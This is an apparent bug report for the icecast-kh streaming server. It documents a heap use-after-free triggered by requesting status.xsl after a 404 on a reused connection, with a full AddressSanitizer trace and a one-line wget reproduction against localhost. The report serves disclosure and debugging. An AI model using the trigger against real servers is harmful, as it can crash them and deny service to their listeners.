Use after free on xsl request sequence with connection reuse

[tatokis]

Requesting an xsl after a 404 (with connection reuse) results in a use after free as the client gets freed after processing the 404, but before processing the xsl.

==6794==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000254f0 at pc 0x7f35fd0925b3 bp 0x7f35f5afadd0 sp 0x7f35f5afa578
READ of size 1 at 0x6020000254f0 thread T5
    #0 0x7f35fd0925b2 in __interceptor_strcmp ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:466
    #1 0x5645ae2757c7 in compare_mounts /home/tasos/icecast-kh/src/cfgfile.c:818
    #2 0x5645ae35a3a6 in avl_get_by_key /home/tasos/icecast-kh/src/avl/avl.c:332
    #3 0x5645ae289858 in config_find_mount /home/tasos/icecast-kh/src/cfgfile.c:1967
    #4 0x5645ae2e64b0 in ice_http_setup_flags /home/tasos/icecast-kh/src/params.c:434
    #5 0x5645ae2ea14e in xslt_prepare_response /home/tasos/icecast-kh/src/xslt.c:522
    #6 0x5645ae2ea85c in xslt_update /home/tasos/icecast-kh/src/xslt.c:587
    #7 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
    #8 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442
    #9 0x7f35fc52684f  (/lib/x86_64-linux-gnu/libc.so.6+0x12684f)

0x6020000254f0 is located 0 bytes inside of 5-byte region [0x6020000254f0,0x6020000254f5)
freed by thread T2 here:
    #0 0x7f35fd0b4537 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127
    #1 0x5645ae2ebe6e in _delete_fh /home/tasos/icecast-kh/src/fserve.c:253
    #2 0x5645ae2ecaeb in remove_from_fh /home/tasos/icecast-kh/src/fserve.c:319
    #3 0x5645ae2ef8bc in file_release /home/tasos/icecast-kh/src/fserve.c:620
    #4 0x5645ae2e09a6 in worker /home/tasos/icecast-kh/src/client.c:882
    #5 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
    #6 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442

previously allocated by thread T2 here:
    #0 0x7f35fd05b9a7 in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:454
    #1 0x5645ae2f244f in fserve_setup_client_fb /home/tasos/icecast-kh/src/fserve.c:978
    #2 0x5645ae2f2fd9 in fserve_setup_client /home/tasos/icecast-kh/src/fserve.c:1056
    #3 0x5645ae2f2f82 in client_http_send /home/tasos/icecast-kh/src/fserve.c:1049
    #4 0x5645ae2dc0a9 in client_send_404 /home/tasos/icecast-kh/src/client.c:266
    #5 0x5645ae2ef072 in fserve_client_create /home/tasos/icecast-kh/src/fserve.c:532
    #6 0x5645ae31a12a in add_authenticated_listener /home/tasos/icecast-kh/src/auth.c:551
    #7 0x5645ae31b8f8 in auth_add_listener /home/tasos/icecast-kh/src/auth.c:741
    #8 0x5645ae299245 in _handle_get_request /home/tasos/icecast-kh/src/connection.c:1898
    #9 0x5645ae29728e in http_client_request /home/tasos/icecast-kh/src/connection.c:1502
    #10 0x5645ae2e08be in worker /home/tasos/icecast-kh/src/client.c:876
    #11 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
    #12 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442

Thread T5 created by T2 here:
    #0 0x7f35fd058685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x5645ae34b776 in thread_create_c /home/tasos/icecast-kh/src/thread/thread.c:342
    #2 0x5645ae2eac8a in xslt_client /home/tasos/icecast-kh/src/xslt.c:635
    #3 0x5645ae2eb079 in _xslt_transform /home/tasos/icecast-kh/src/xslt.c:664
    #4 0x5645ae2eb0b3 in xslt_transform /home/tasos/icecast-kh/src/xslt.c:671
    #5 0x5645ae2d6287 in stats_transform_xslt /home/tasos/icecast-kh/src/stats.c:1157
    #6 0x5645ae319f51 in add_authenticated_listener /home/tasos/icecast-kh/src/auth.c:537
    #7 0x5645ae31b8f8 in auth_add_listener /home/tasos/icecast-kh/src/auth.c:741
    #8 0x5645ae299245 in _handle_get_request /home/tasos/icecast-kh/src/connection.c:1898
    #9 0x5645ae29728e in http_client_request /home/tasos/icecast-kh/src/connection.c:1502
    #10 0x5645ae2e08be in worker /home/tasos/icecast-kh/src/client.c:876
    #11 0x5645ae34cab0 in _start_routine /home/tasos/icecast-kh/src/thread/thread.c:768
    #12 0x7f35fc494ac2 in start_thread nptl/pthread_create.c:442

Thread T2 created by T0 here:
    #0 0x7f35fd058685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x5645ae34b776 in thread_create_c /home/tasos/icecast-kh/src/thread/thread.c:342
    #2 0x5645ae2e1189 in worker_start /home/tasos/icecast-kh/src/client.c:957
    #3 0x5645ae2e1818 in workers_adjust /home/tasos/icecast-kh/src/client.c:1030
    #4 0x5645ae2a9dd1 in slave_startup /home/tasos/icecast-kh/src/slave.c:1261
    #5 0x5645ae2a9eeb in _slave_thread /home/tasos/icecast-kh/src/slave.c:1272
    #6 0x5645ae2a1c21 in slave_initialize /home/tasos/icecast-kh/src/slave.c:256
    #7 0x5645ae28a7fb in server_process /home/tasos/icecast-kh/src/main.c:236
    #8 0x5645ae28b6dd in main /home/tasos/icecast-kh/src/main.c:435
    #9 0x7f35fc429d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:466 in __interceptor_strcmp
Shadow bytes around the buggy address:
  0x0c047fffca40: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fffca50: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fffca60: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fffca70: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fffca80: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
=>0x0c047fffca90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa[fd]fa
  0x0c047fffcaa0: fa fa fd fa fa fa fd fa fa fa 04 fa fa fa 00 04
  0x0c047fffcab0: fa fa 00 00 fa fa 00 03 fa fa 05 fa fa fa 00 00
  0x0c047fffcac0: fa fa 00 02 fa fa 04 fa fa fa 00 00 fa fa 00 03
  0x0c047fffcad0: fa fa 04 fa fa fa 00 00 fa fa 06 fa fa fa 00 04
  0x0c047fffcae0: fa fa 00 00 fa fa 05 fa fa fa 00 07 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==6794==ABORTING

To reproduce, use this exact same command. Curl by default will not reuse the connection and thus won't trigger this issue.

wget http://localhost:8000/404 http://localhost:8000/status.xsl

Note the connection reuse:

--2024-11-25 23:52:43--  http://localhost:8000/404
Resolving localhost (localhost)... ::1, 127.0.0.1
Connecting to localhost (localhost)|::1|:8000... connected.
HTTP request sent, awaiting response... 404 File Not Found
2024-11-25 23:52:43 ERROR 404: File Not Found.

--2024-11-25 23:52:43--  http://localhost:8000/status.xsl
Reusing existing connection to [localhost]:8000.
HTTP request sent, awaiting response... No data received.
Retrying.